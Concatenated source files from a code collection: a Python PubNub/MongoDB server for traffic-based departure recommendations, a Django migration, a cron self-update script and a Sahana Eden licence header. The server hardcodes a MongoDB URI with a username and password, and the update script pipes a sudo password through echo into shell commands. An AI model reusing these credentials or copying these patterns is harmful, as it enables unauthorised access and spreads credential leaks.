                                    # ILLUSTRATION 6.4.1(Scenario 1) --> Return the latest late and early recommendations to the user
                                    recommendationResult.update({"Early":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach %s min(s) early"%(abs(diff_minutes)),"pred_minutesReal":pred_minutesReal}})
                                    recommendationFlag = False
                            # ILLUSTRATION STEP 6.7(Condition) --> Checking for the late
                            else:
                                if diff_minutes <0:
                                    pred_minutesReal = pred_minutes[i]-TimeDurationOffset
                                    if (time[i] not in checkedOnce):
                                        checkedOnce.append(time[i])
                                        # ILLUSTRATION STEP 6.1,6.2 --> Derive the latest Recommendation
                                        recommendationResult.update({"Late":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach %s min(s) late"%(abs(diff_minutes)),"pred_minutesReal":pred_minutesReal}})
                                        # ILLUSTRATION STEP 6.7(Operation) --> Move RRST 10min Backward
                                        i-=1
                                    else:
                                        # ILLUSTRATION 6.4.1(Scenario 2) --> Return the latest early and late recommendations to the user
                                        recommendationResult.update({"Late":{"predictedDepartureTime":str(time[i].replace(second=0,tzinfo=None)),"predictedArrivalTime":str(predictedArrivalTime.replace(tzinfo=None)),"dep_note":"You will reach %s min(s) late"%(abs(diff_minutes)),"pred_minutesReal":pred_minutesReal}})
                                        recommendationFlag = False
                                else:
                                    i+=1
                        # Flatten the {onTime/Early/Late: {...}} map into a list for the client.
                        recommresult = []
                        for val in recommendationResult.keys():
                            recommresult.append(recommendationResult[val])
                        pub_dict = {"responseType":1,"route_name":client_data[clientID]['routeName'],"arrival_time":str(DesiredArrivalTime.replace(tzinfo=None)),"recommendation":recommresult}
                        publish_handler(client_data[clientID]["clientID"],pub_dict)
                        logging.info("The sent message for the recommendationmessage%s\n"%(str(pub_dict)))
                        client_data[clientID].update({"recommndsentproceed":False})
                except Exception as e:
                    logging.error("The error occured in recommalgoinnerError is %s,%s\n"%(e,type(e)))
                    result = {"responseType":4,"message":"oops!! Internal problem"}
                    publish_handler(clientID,result)
    except Exception as recommalgoError:
        result = {"responseType":4,"message":"oops!! Internal problem"}
        publish_handler(clientID,result)
        logging.error("The error occured in recommalgoError is %s,%s\n"%(recommalgoError,type(recommalgoError)))
'''****************************************************************************************
Function Name : Alerts (Algorithm operation)
Description : Function used to get and send the Alerts to the client
Parameters : clientID - client's UUID
alert - Flag(True-->When journey started , False -->before journey) internal operation purpose
****************************************************************************************'''
def Alerts(clientID,alert):
    """Fetch the latest traffic incidents for the client's route and publish them.

    Reads the newest ttobgcoll document for the route, collects incidents of
    type 4, keeps only the most severe one when several exist, and publishes
    it — through alertpublish_handler when the journey has started (alert is
    True), otherwise through publish_handler.

    Parameters:
        clientID - client UUID
        alert    - True once the journey started, False before the journey
    """
    # FIX: pre-bind alertdoc so the exception handler below can always log it;
    # previously a failure before the Mongo loop left it unbound and the
    # handler itself raised NameError.
    alertdoc = None
    try:
        Limit = 1
        alertList = []
        routeName = client_data[clientID]["routeName"]
        alertcursorproceed = False
        length = -1
        try:
            #Alerts are in the ttobgcoll collection so getting the latest alerts for the route
            for alertdatedoc in newttobackground.ttobgcoll.find({"route":routeName}).sort('recorddate', pymongo.DESCENDING).limit(Limit):
                endDate = alertdatedoc['recorddate']
                for alertdoc in newttobackground.ttobgcoll.find({"route":routeName,"recorddate":endDate}):
                    length = len(alertdoc['traffic']['incidents'])
                alertcursorproceed = True
        except Exception as e:
            logging.error("The latestalertcursor error is %s,%s\n"%(e,type(e)))
        alertseverity = []
        if (alertcursorproceed == True and length != -1):
            # Keep only type-4 incidents, remembering each one's severity.
            for i in range(length):
                if alertdoc['traffic']['incidents'][i]['type'] == 4:
                    alertList.append({"eventType":alertdoc['traffic']['incidents'][i]['type'],"shortDesc":alertdoc['traffic']['incidents'][i]['shortDesc']})
                    alertseverity.append(alertdoc['traffic']['incidents'][i]['severity'])
            # With several incidents, publish only the most severe one.
            if (len(alertseverity)>1):
                secltdalert = max(alertseverity)
                maxseverealertIndex = alertseverity.index(secltdalert)
                alertList = [alertList[maxseverealertIndex]]
            alertpub_dict = {"responseType":2,"message":alertList}
            logging.info("AlertsMessage-->%s,%s\n"%(str(alertpub_dict),str(clientID)))
            # if there are any alerts then send or dont
            if (len(alertList)>0):
                if alert == True:
                    alertpublish_handler(clientID,alertpub_dict)
                else:
                    publish_handler(clientID,alertpub_dict)
            else:
                pass
    except Exception as alertError:
        logging.error("The error occured in alertError is %s,%s\n"%(alertError,type(alertError)))
        logging.info(str(alertdoc)+"\n")
'''****************************************************************************************
Function Name : beforeJourneyTenminUpdate (Algorithm operation)
Description : Function used invoke the beforeJourney function every ten minute
****************************************************************************************'''
def beforeJourneyTenminUpdate():
    """Worker-thread loop: every ~10 minutes raise 'everyTenminproceed' for
    every client still in the pre-journey stage, so beforeJourney() performs
    its periodic recommendation/alert check for them.

    Runs forever; fires when the wall-clock minute satisfies
    minute % g_minit == g_divCompare, then sleeps g_sleepTime seconds.
    """
    while True:
        try:
            global g_minit,g_sleepTime,g_divCompare
            i = 0
            while True:
                if(int(datetime.datetime.now().strftime("%M"))%g_minit == g_divCompare):
                    if (len(beforeJourneyClientList.keys())>0):
                        # NOTE: alias, not a copy — both names point at client_data
                        localDictbeforeJourneyupdate = client_data
                        for cid in beforeJourneyClientList.keys():
                            numofclients = len(beforeJourneyClientList.keys())
                            if cid in beforeJourneyClientList.keys():
                                # i caps how many clients are flagged per tick
                                if i<numofclients:
                                    try:
                                        if cid in client_data.keys():
                                            client_data[cid].update({"everyTenminproceed":True})
                                        i+=1
                                    except Exception as e:
                                        logging.error("The beforeJourneyTenminUpdateinternalError Exception is %s,%s\n"%(e,type(e)))
                else:
                    i = 0
                time.sleep(g_sleepTime)
        except Exception as beforeJourneyTenminUpdateError:
            logging.error("The error occured in beforeJourneyTenminUpdateError is %s,%s\n"%(beforeJourneyTenminUpdateError,type(beforeJourneyTenminUpdateError)))
'''****************************************************************************************
Function Name : startedJourneyTenminUpdate (Algorithm operation)
Description : Function used invoke the startedJourney function every ten minute
****************************************************************************************'''
def startedJourneyTenminUpdate():
    """Worker-thread loop: every ~10 minutes re-arm 'alertsentproceed' and
    'everyTenminproceed' for every client whose journey has started, so
    startedJourney() sends it the next round of traffic alerts.

    Runs forever; fires when the wall-clock minute satisfies
    minute % g_minit == g_divCompare, then sleeps g_sleepTime seconds.
    """
    while True:
        try:
            global g_minit,g_sleepTime,g_divCompare
            i = 0
            while True:
                if (int(datetime.datetime.now().strftime("%M"))%g_minit == g_divCompare):
                    if (len(startedJourneyClientList.keys())>0):
                        # NOTE: alias, not a copy — both names point at client_data
                        localDictStartedJourneyupdate = client_data
                        for cid in startedJourneyClientList.keys():
                            if cid in commonStartedClientIDList:
                                numofclients = len(startedJourneyClientList.keys())
                                # i caps how many clients are flagged per tick
                                if i<numofclients:
                                    try:
                                        if cid in startedJourneyClientList.keys():
                                            startedJourneyClientList[cid].update({"alertsentproceed":True})
                                        if cid in client_data.keys():
                                            client_data[cid].update({"everyTenminproceed":True})
                                        i+=1
                                    except Exception as e:
                                        logging.error("The startedJourneyTenminUpdateinternalError Exception is %s,%s\n"%(e,type(e)))
                else:
                    i = 0
                time.sleep(g_sleepTime)
        except Exception as startedJourneyTenminUpdateError:
            logging.error("The error occured in startedJourneyTenminUpdateError is %s,%s\n"%(startedJourneyTenminUpdateError,type(startedJourneyTenminUpdateError)))
'''****************************************************************************************
Function Name : stopJourney (Algorithm operation)
Description : Function used to delete the invalid clients from the internal Algorithm operations
****************************************************************************************'''
def stopJourney(stpCid):
    """Forget a client that ended its journey.

    Removes the client's entry from client_data and drops its UUID from the
    pre-journey and started-journey ID lists (first occurrence only).

    Parameters:
        stpCid - UUID of the client to remove
    """
    try:
        target = stpCid
        if target in client_data:
            del client_data[target]
        # Drop the first occurrence from whichever stage lists contain it.
        for stage_list in (commonClientIDList, commonStartedClientIDList):
            if target in stage_list:
                stage_list.remove(target)
    except Exception as stopJourneyError:
        logging.error("The error occured in stopJourneyError is %s,%s\n"%(stopJourneyError,type(stopJourneyError)))
'''****************************************************************************************
Function Name : recommendationAlertFunc (Algorithm operation)
Description : Function used to get and send the Alerts to the client
Parameters : recommtime - client's Recommended Departure Time
cid - client's UUID
pred_minutesReal - The travel duration time for the Recommended Departure Time
****************************************************************************************'''
def recommendationAlertFunc(recommtime,cid,pred_minutesReal):
    """Check whether the prediction for a client's recommended departure time
    has changed since the recommendation was issued.

    Parameters:
        recommtime       - the client's recommended departure time (naive datetime)
        cid              - client UUID
        pred_minutesReal - travel duration (minutes) originally recommended

    Returns a (result, delta) tuple:
        (1, 0)          - prediction unchanged (or no data / error: treated as unchanged)
        (0, delta_min)  - prediction changed by delta_min minutes (signed float)
    """
    try:
        recommendationAlertPredictions = []
        recommendationAlertTime = []
        recommendationAlertIndex = -1
        recommtime = recommtime.replace(second=0)
        try:
            cursor = newttobackground.ttoresultcoll.find({"route":client_data[cid]['routeName']})
            for doc in cursor:
                recommendationAlertPredictions.append(doc['predictioninmins'])
                recommendationAlertTime.append(doc['time'].replace(second=0))
            if recommtime in recommendationAlertTime:
                recommendationAlertIndex = recommendationAlertTime.index(recommtime)
        except Exception as e:
            logging.error("The error occured in internal recommendationAlertFunc is %s,%s\n"%(e,type(e)))
        if (recommendationAlertIndex != -1):
            # Compare in seconds to sidestep fractional-minute noise.
            val = int(recommendationAlertPredictions[recommendationAlertIndex]) * 60
            pred_minutesReal = int(pred_minutesReal) * 60
            if pred_minutesReal == val:
                logging.info("recommendationAlertMessage--> no change%s,%s\n"%(str(val),str(pred_minutesReal)))
                return 1,0
            else:
                diff = pred_minutesReal - val
                logging.info("recommendationAlertMessage-->change in predictions %s,%s,%s\n"%(str(val),str(pred_minutesReal),str(float(diff)/60.0)))
                return 0,float(diff)/60.0
        else:
            logging.info("The recommtime-->%s"%(str(recommtime)))
            # FIX: previously fell off the end and returned None, making the
            # caller's ``result,val = ...`` unpack raise TypeError and killing
            # the beforeJourney thread. Report "no change" instead.
            return 1,0
    except Exception as recommendationAlertFuncError:
        logging.error("The error occured in recommendationAlertFuncError is %s,%s\n"%(recommendationAlertFuncError,type(recommendationAlertFuncError)))
        # FIX: same None-return problem on the error path — fail safe as "no change".
        return 1,0
'''****************************************************************************************
Function Name : beforeJourney (Algorithm operation)
Description : Function responsible for updates regarding the change in Recommendation change
and Alerts before journey starts
****************************************************************************************'''
def beforeJourney():
    """Worker-thread loop for clients that confirmed a recommendation but have
    not departed yet.

    For each such client whose recommended departure is within the next 12
    hours, once every ~10 minutes (gated by the 'everyTenminproceed' flag set
    by beforeJourneyTenminUpdate) it re-checks the stored prediction via
    recommendationAlertFunc, publishes an updated departure suggestion when
    the prediction changed, and forwards any traffic alerts.

    NOTE(review): this loop has no sleep of its own — it spins continuously
    and relies on the flag gating; confirm this is intentional.
    """
    try:
        global g_minit,g_divCompare
        while True:
            if (len(beforeJourneyClientList.keys())>0):
                for cid in beforeJourneyClientList.keys():
                    if cid in commonClientIDList:
                        # NOTE: alias into client_data[cid], not a copy
                        localDict = client_data[cid]
                        presentrouteTime = datetime.datetime.now(pytz.timezone(localDict['timeZone']))
                        recommendedTime = beforeJourneyClientList[cid]["recommendedDepTime"]
                        diff = recommendedTime-presentrouteTime
                        diffMin = (diff.days * 24 * 60) + (diff.seconds/60)
                        # executes every10min thats why one more condition checking for 10mins
                        if (0<=diffMin<= 720):
                            val = datetime.datetime.now(pytz.timezone(localDict['timeZone'])).strftime("%M")
                            if (int(val)%g_minit == g_divCompare and localDict['everyTenminproceed'] == True):#make sure you are dividing with 10 for the 10min purpose
                                arrivalTime = datetime.datetime.strptime(localDict["arrivalTime"], "%Y-%m-%d %H:%M:%S")
                                zone = pytz.timezone(localDict["timeZone"])
                                arrivalTime = zone.localize(arrivalTime)
                                existedRecommendation = beforeJourneyClientList[cid]["recommendedDepTime"]
                                existedpredminutesReal = beforeJourneyClientList[cid]["pred_minutesReal"]
                                # strip tz: recommendationAlertFunc compares naive slot times
                                existedRecommendation = existedRecommendation.replace(tzinfo=None)
                                result,val = recommendationAlertFunc(existedRecommendation,cid,existedpredminutesReal)
                                logging.info("beforejourneyMessage-->clients now%s\n"%(str(cid)))
                                if result == 0:#Different prediction
                                    localDict.update({"recommndsentproceed":True})
                                    # means new recommendation
                                    localDict.update({"everyTenminproceed":False})
                                    # means comeback after 10mins
                                    if val > 0:
                                        message = {"responseType":3,"message":"You should start %smin(s) after %s"%(int(val),str(recommendedTime.replace(second=0,tzinfo=None)))}
                                    if val < 0:
                                        message = {"responseType":3,"message":"You should start %smin(s) earlier than %s "%(abs(int(val)),str(recommendedTime.replace(second=0,tzinfo=None)))}
                                    logging.info("recommendationAlert -->%s"%(str(message)))
                                    publish_handler(cid,message)
                                else:
                                    # # means new recommendation
                                    localDict.update({"everyTenminproceed":False})
                                #Alerts
                                localDict.update({"recommndsentproceed":True})
                                Alerts(cid,False)
                                localDict.update({"recommndsentproceed":False})
                                # updating to main dictionary
                                if cid in client_data.keys():
                                    client_data[cid].update({"recommndsentproceed":localDict["recommndsentproceed"],"everyTenminproceed":localDict["everyTenminproceed"]})
                    else:
                        # it means client started the journey moved to startjourneylist
                        # NOTE(review): deleting while iterating .keys() is only safe
                        # under Python 2 (keys() returns a list) — confirm runtime.
                        del beforeJourneyClientList[cid]
    except Exception as beforejourneyError:
        logging.error("The error occured in beforejourneyError is %s,%s\n"%(beforejourneyError,type(beforejourneyError)))
'''****************************************************************************************
Function Name : startedJourney (Algorithm operation)
Description : Function responsible to send Alerts if any after journey starts
****************************************************************************************'''
def startedJourney():
    """Worker-thread loop for clients whose journey has started: roughly every
    10 minutes (gated by 'everyTenminproceed') push fresh traffic alerts for
    each active client, then clear the flag until the next tick.

    When the started-journey dict and the common ID list disagree, prune dict
    entries whose UUID is no longer in the common list.
    """
    while True:
        try:
            global g_minit,g_sleepTime,g_divCompare
            while True:
                if (len(startedJourneyClientList.keys()) == len(commonStartedClientIDList)):
                    # NOTE: alias, not a copy — both names point at client_data
                    localDictStartedJourney = client_data
                    for strtCid in startedJourneyClientList.keys():
                        if strtCid in commonStartedClientIDList:
                            presentrouteTimeminute = int(datetime.datetime.now(pytz.timezone(localDictStartedJourney[strtCid]['timeZone'])).strftime("%M"))
                            if (presentrouteTimeminute%g_minit == g_divCompare and localDictStartedJourney[strtCid]['everyTenminproceed'] == True):
                                logging.info("startedJourneyMessage--> Clients now%s\n"%(str(strtCid)))
                                Alerts(strtCid,True)
                                if strtCid in client_data.keys():
                                    client_data[strtCid].update({"everyTenminproceed":False})
                else:
                    # Prune clients that left the common list (journey ended).
                    # NOTE(review): deleting while iterating .keys() is only safe
                    # under Python 2 (keys() returns a list) — confirm runtime.
                    for strtCid in startedJourneyClientList.keys():
                        if strtCid not in commonStartedClientIDList:
                            del startedJourneyClientList[strtCid]
        except Exception as startedJourneyError:
            logging.error("The error occured in startedJourneyError is %s,%s\n"%(startedJourneyError,type(startedJourneyError)))
'''****************************************************************************************
Function Name : delCheck (Algorithm operation)
Description : Function responsible to delete the expired clients
****************************************************************************************'''
def delCheck():
    """Worker-thread loop: once per g_minit-aligned tick, evict clients whose
    journey window has fully elapsed (desired arrival time + theoretical
    travel time + one-hour buffer is in the past) from client_data, the
    started-journey dict and the common started-ID list.
    """
    while True:
        try:
            global g_sleepTime,g_minit
            i=0
            while True:
                if (int(datetime.datetime.now().strftime("%M"))%g_minit == 0):
                    if len(client_data.keys())>0:
                        # NOTE: alias, not a copy — both names point at client_data
                        localDictDelcheck = client_data
                        for clientID in localDictDelcheck.keys():
                            numofclients = len(localDictDelcheck.keys())
                            # i caps how many clients are examined per tick
                            if i<numofclients:
                                if clientID in localDictDelcheck.keys():
                                    DAT = datetime.datetime.strptime(str(localDictDelcheck[clientID]["arrivalTime"]), "%Y-%m-%d %H:%M:%S")
                                    zone = pytz.timezone(localDictDelcheck[clientID]["timeZone"])
                                    DAT = zone.localize(DAT)
                                    # Deleting the clients that crossed the Arrival time range.
                                    travelTime = int(localDictDelcheck[clientID]['theoryTime'])+3600
                                    journeyEndTime = DAT + datetime.timedelta(seconds=travelTime)# journey end = DAT + travel time + one-hour (3600 s) buffer
                                    presentrouteTime = datetime.datetime.now(pytz.timezone(localDictDelcheck[clientID]['timeZone']))
                                    diff = journeyEndTime - presentrouteTime
                                    diff_minutes = (diff.days *24*60)+(diff.seconds/60)
                                    if diff_minutes<=0:
                                        # clearing the startedJourneyList dictionary.
                                        if clientID in startedJourneyClientList.keys():
                                            logging.info("delCheckMessage--> Something to Delete in startedJourneyClientList %s,%s\n"%(str(clientID),str(DAT)))
                                            del startedJourneyClientList[clientID]
                                        if clientID in client_data.keys():
                                            logging.info("delCheckMessage--> Something to Delete in client_data %s,%s\n"%(str(clientID),str(DAT)))
                                            del client_data[clientID]
                                        #clearing the commonStartedClientIDList.
                                        if clientID in commonStartedClientIDList:
                                            logging.info("delCheckMessage--> Something to Delete in commonStartedClientIDList %s,%s\n"%(str(clientID),str(DAT)))
                                            index = commonStartedClientIDList.index(clientID)
                                            del commonStartedClientIDList[index]
                                    else:
                                        # timerange over checking else part
                                        logging.info("delCheckMessage--> Nothing to Delete%s,%s\n"%(str(clientID),str(DAT)))
                                else:
                                    # client_data keys checking else part
                                    pass
                                i+=1
                else:
                    i=0
                time.sleep(g_sleepTime)
        except Exception as delCheckError:
            logging.error("The error occured in delCheckError is %s,%s\n"%(delCheckError,type(delCheckError)))
'''****************************************************************************************
Function Name : tto_callback (Callback operation)
Description : Callback function listens to the channel for the messages
Parameters : message - message from the client
channel - UUID of the client
****************************************************************************************'''
def tto_callback(message,channel):
    """Pubnub subscribe callback: dispatch incoming client requests.

    Expects *message* to be a dict with at least 'requestType' and 'CID'.
    Request types:
        1 - ask for a departure recommendation (also registers the client)
        2 - journey started (move client to the started-journey stage)
        3 - journey ended (forget the client)
        4 - client confirmed a recommendation (remember it for follow-ups)

    Parameters:
        message - payload dict from the client
        channel - pubnub channel the message arrived on
    """
    try:
        if message.has_key("requestType") and message.has_key("CID"):
            logging.info(str(message)+"\n")#printing the message we receive from the client
            clientID = str(message['CID'])
            requestType = int(message['requestType'])
            if clientID in client_data.keys():
                if requestType == 1: # request for the recommendation
                    # here client should be there in the commonClientIDList because we are adding it at time of entrance
                    if clientID not in commonClientIDList:
                        commonClientIDList.append(clientID)
                    routeName = str(message['routeName'])#only in requesttype 1 we will get it
                    # adding necessary client data
                    if not client_data.has_key(clientID):
                        client_data.setdefault(clientID,{"clientID":clientID,"timeZone":zone_ttimedct[routeName][0],"theoryTime":zone_ttimedct[routeName][1],"arrivalTime":str(message['arrivalTime']),"routeName":routeName,"everyTenminproceed":False,"recommndsentproceed":True,"alertsentproceed":False})
                    # datetime format
                    arrivalTime = datetime.datetime.strptime(str(message['arrivalTime']), "%Y-%m-%d %H:%M:%S")
                    # adding timezone using localizing technique
                    zone = pytz.timezone(client_data[clientID]["timeZone"])
                    arrivalTime = zone.localize(arrivalTime)
                    recommendationAlgoFunc(arrivalTime,clientID)#calling the recommendation algorithm function
                if requestType == 2: #request for starting the journey
                    startTime = datetime.datetime.strptime(str(message["startTime"]),"%Y-%m-%d %H:%M:%S")
                    zone = pytz.timezone(client_data[clientID]["timeZone"])
                    # NOTE(review): the localized start time is bound to the name
                    # ``arrivalTime`` and stored below as "recommendedTime" —
                    # confirm this naming is intentional.
                    arrivalTime = zone.localize(startTime)
                    # sharing client id with started journey list so that there wont any problem for the dependency functions
                    if clientID not in commonStartedClientIDList:
                        commonStartedClientIDList.append(clientID)
                    if not startedJourneyClientList.has_key(clientID):
                        startedJourneyClientList.setdefault(clientID,{"clientID":clientID,"recommendedTime":arrivalTime})
                    # incase if the client started journey immeddiately before entering into the beforejourney list
                    if clientID in commonClientIDList:
                        index = commonClientIDList.index(clientID)
                        del commonClientIDList[index]
                    # updating alertsentproceed so the alerts will work for the client
                    client_data[clientID].update({"alertsentproceed":True})
                    # callling the alertsent function
                    Alerts(clientID,True)
                    logging.info("The clients in startedJourney stage %s\n"%(str(startedJourneyClientList)))
                if requestType == 3: #when clients ends the journey
                    stpCid = str(message['CID'])
                    stopJourney(stpCid)
                if requestType == 4:# confirmation from the client to remember the query
                    recommendedDepTime = datetime.datetime.strptime(message['recommendedDepTime'], "%Y-%m-%d %H:%M:%S")
                    zone = pytz.timezone(client_data[clientID]["timeZone"])
                    recommendedDepTime = zone.localize(recommendedDepTime)
                    if not beforeJourneyClientList.has_key(clientID):
                        beforeJourneyClientList.setdefault(clientID,{"clientID":clientID,"recommendedDepTime":recommendedDepTime,"pred_minutesReal":message['pred_minutesReal']})
                    logging.info("The clients in the beforeJourney stage%s\n"%(str(beforeJourneyClientList)))
            else:
                # Unknown client: only a fresh recommendation request (type 1)
                # registers it; any other request type is ignored.
                if requestType == 1:
                    if clientID not in commonClientIDList:
                        commonClientIDList.append(clientID)
                    routeName = str(message['routeName'])#only in requesttype 1 we will get it
                    # adding necessary client data
                    if not client_data.has_key(clientID):
                        client_data.setdefault(clientID,{"clientID":clientID,"timeZone":zone_ttimedct[routeName][0],"theoryTime":zone_ttimedct[routeName][1],"arrivalTime":str(message['arrivalTime']),"routeName":routeName,"everyTenminproceed":False,"recommndsentproceed":True,"alertsentproceed":False})
                    # datetime format
                    arrivalTime = datetime.datetime.strptime(message['arrivalTime'], "%Y-%m-%d %H:%M:%S")
                    # adding timezone using localizing technique
                    zone = pytz.timezone(client_data[clientID]["timeZone"])
                    arrivalTime = zone.localize(arrivalTime)
                    recommendationAlgoFunc(arrivalTime,clientID)#calling the recommendation algorithm function
        else:
            pass
    except Exception as callbackError:
        logging.error("The error occured in callbackError is %s,%s\n"%(callbackError,type(callbackError)))
'''****************************************************************************************
Function Name : error
Description : If error in the channel, prints the error
Parameters : message - error message
****************************************************************************************'''
def error(message):
    """Pubnub error callback: record channel failures in the server log."""
    text = "ERROR on Pubnub: " + str(message) + "\n"
    logging.error(text)
'''****************************************************************************************
Function Name : connect
Description : Responds if server connects with pubnub
Parameters : message - connect message
****************************************************************************************'''
def connect(message):
    """Pubnub connect callback: note that the server is now connected."""
    logging.info("CONNECTED\n")
'''****************************************************************************************
Function Name : reconnect
Description : Responds if server reconnects with pubnub
Parameters : message - reconnect message
****************************************************************************************'''
def reconnect(message):
    """Pubnub reconnect callback: note that the connection was re-established."""
    logging.info("RECONNECTED\n")
'''****************************************************************************************
Function Name : disconnect
Description : Responds if server disconnects from pubnub
Parameters : message - disconnect message
****************************************************************************************'''
def disconnect(message):
    """Pubnub disconnect callback: note that the connection was lost."""
    logging.info("DISCONNECTED\n")
'''****************************************************************************************
Function Name : channel_subscriptions (pubnub operation)
Description : Function intializes the pubnub subscribing to a specific channel
****************************************************************************************'''
def channel_subscriptions():
    """Subscribe the server to the 'ttotest1' channel with all lifecycle
    callbacks wired to the module-level handlers."""
    global pubnub
    try:
        pubnub.subscribe(
            channels='ttotest1',
            callback=tto_callback,
            error=error,
            connect=connect,
            reconnect=reconnect,
            disconnect=disconnect,
        )
    except Exception as channelsubserror:
        logging.error("The error occured in channel_subscriptions is %s,%s\n"%(channelsubserror,type(channelsubserror)))
'''****************************************************************************************
Function Name : mongoInit (Mongodb operation)
Description : Function initalizes the mongodb connection
****************************************************************************************'''
def mongoInit():
    """Initialise the global MongoDB handle for the 'newttobackground' database.

    Returns True on success and False on failure, mirroring pub_Init so that
    Init() can test the result.

    FIX: the original returned None on every path, so Init()'s
    ``dBreturn == False`` check could never detect a Mongo failure.
    NOTE(review): MongoClient connects lazily, so a bad server may still
    succeed here and only fail on first query — confirm acceptable.
    """
    global newttobackground
    try:
        uri ='mongodb://rajeevtto:radiostud@ds035315-a0.mongolab.com:35315,ds035315-a1.mongolab.com:35315/newttobackground?replicaSet=rs-ds035315'
        client = MongoClient(uri)
        newttobackground = client.newttobackground
        logging.info('connected\n')
        return True
    except Exception as e:
        logging.error("The error occured in mongoInit is %s,%s\n"%(e,type(e)))
        return False
'''****************************************************************************************
Function Name : pub_Init (pubnub operation)
Description : Function intializes the pubnub connection
****************************************************************************************'''
def pub_Init():
    """Create the global Pubnub client from the module-level keys.

    Returns:
        True when the client was constructed, False otherwise.
    """
    global pubnub
    try:
        pubnub = Pubnub(publish_key=pub_key, subscribe_key=sub_key)
    except Exception as creation_error:
        logging.error("The pubException is %s,%s\n" % (creation_error, type(creation_error)))
        return False
    return True
'''****************************************************************************************
Function Name : Init (Functional operation)
Description : Function initializes the pubinit and mongoinit
****************************************************************************************'''
def Init():
    # Bring up the MongoDB connection and the Pubnub client, then start
    # listening on the channel.  Note the comparison style: only an
    # explicit False return value is treated as failure here, so a
    # helper that returns None is treated as success.
    dBreturn = mongoInit()
    pbreturn = pub_Init()
    if (dBreturn == False or pbreturn == False):
        logging.info("Program Terminated\n")
        sys.exit()
    else:
        channel_subscriptions()
if __name__ == '__main__':
    # Entry point: run the Pubnub/Mongo initialisation and the five
    # background workers concurrently.  Each target is defined earlier
    # in this module.  The threads are never joined, so the process
    # stays alive for as long as any non-daemon thread is running.
    try:
        f1 = threading.Thread(target = Init)
        f2 = threading.Thread(target = beforeJourney)
        f3 = threading.Thread(target = startedJourney)
        f4 = threading.Thread(target = beforeJourneyTenminUpdate)
        f5 = threading.Thread(target = startedJourneyTenminUpdate)
        f6 = threading.Thread(target = delCheck)
        f1.start()
        f2.start()
        # NOTE(review): f4 is started before f3 -- presumably ordering
        # does not matter here, but confirm this is intentional.
        f4.start()
        f3.start()
        f5.start()
        f6.start()
    except Exception as e:
        logging.error("The main Exception is %s,%s\n"%(e,type(e)))
|
shyampurk/tto-bluemix
|
ttoServer/ttoServer.py
|
Python
|
mit
| 37,445
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-12 15:31
from __future__ import unicode_literals
from django.db import migrations, models
import django.utils.timezone
import picklefield.fields
import src.models
class Migration(migrations.Migration):
    # Auto-generated initial migration (Django 1.11) for the CallLater
    # model: a persisted deferred/repeating function call.  The callable
    # and its arguments are stored as pickled blobs; do not hand-edit
    # field definitions here -- create a follow-up migration instead.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='CallLater',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(default='', max_length=64, verbose_name='additional lookup field')),
                ('time_to_run', models.DateTimeField(default=django.utils.timezone.now)),
                ('time_to_stop', models.DateTimeField(blank=True, null=True)),
                ('function', picklefield.fields.PickledObjectField(editable=False)),
                ('args', picklefield.fields.PickledObjectField(editable=False, null=True)),
                ('kwargs', picklefield.fields.PickledObjectField(editable=False, null=True)),
                ('repeat', models.PositiveIntegerField(default=1)),
                ('every', models.DurationField(blank=True, null=True)),
                ('when_check_if_failed', models.DateTimeField(default=src.models.far_future_fail_timeout)),
                ('retries', models.PositiveIntegerField(default=3)),
                ('timeout_retries', models.PositiveIntegerField(default=2)),
                ('problem', models.BooleanField(default=False)),
            ],
        ),
    ]
|
andytwoods/zappa-call-later
|
zappa-call-later/migrations/0001_initial.py
|
Python
|
mit
| 1,577
|
import os
from decouple import config
sudoPassword = config('SUDOPASSWORD')
def update():
    """
    Automatisches Update des Reservierungssystems über Github
    (automatic self-update of the reservation system via GitHub:
    stop the supervised app, pull the latest code, restart the app
    and make the startup script executable again).

    SECURITY NOTE(review): the sudo password is interpolated into a
    shell command line (``echo <pw>|sudo -S ...``), which exposes it in
    the process list; prefer ``subprocess.run([...], input=...)``.
    """
    try:
        # BUG FIX: the old "stop" command also *started* the service and
        # ran chmod, so the service was running again before `git pull`.
        # Only stop it here; it is restarted further down.
        command_stop = 'sudo supervisorctl stop abwreservierung'
        os.system('echo %s|sudo -S %s' % (sudoPassword, command_stop))
    except Exception:
        # os.system rarely raises; failures surface via its (ignored)
        # exit status -- this whole routine is deliberately best-effort.
        pass
    try:
        os.system('cd /home/webserver/abwreservierung && git pull')
    except Exception:
        pass
    try:
        command_start = 'sudo supervisorctl start abwreservierung'
        os.system('echo %s|sudo -S %s' % (sudoPassword, command_start))
    except Exception:
        pass
    try:
        command_chmod = 'sudo chmod +x startup'
        os.system('echo %s|sudo -S %s' % (sudoPassword, command_chmod))
    except Exception:
        pass
def alte_reservierungen():
    """
    Automatically remove old reservations
    (German: Automatisches entfernen der alten Reservierungen).
    """
    # Runs the Django management command `alte_reservierungen` inside
    # the project's virtualenv; exit status is ignored (best-effort).
    os.system("/bin/bash -c 'source ../django-server/bin/activate && python src/manage.py alte_reservierungen && deactivate'")
# Schedule the maintenance jobs.
# NOTE(review): BlockingScheduler is not imported anywhere in this file --
# presumably `from apscheduler.schedulers.blocking import BlockingScheduler`
# is expected; confirm, otherwise this raises NameError at import time.
scheduler = BlockingScheduler()
scheduler.add_job(update, 'cron', day_of_week='sun', hour=12)  # weekly self-update, Sundays 12:00
scheduler.add_job(alte_reservierungen, 'cron', day_of_week="mon-fri", hour=17)  # purge old reservations, weekdays 17:00
scheduler.start()  # blocks forever
|
holytortoise/abwreservierung
|
auto_process.py
|
Python
|
mit
| 1,255
|
# -*- coding: utf-8 -*-
""" Sahana Eden Assets Model
@copyright: 2009-2012 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
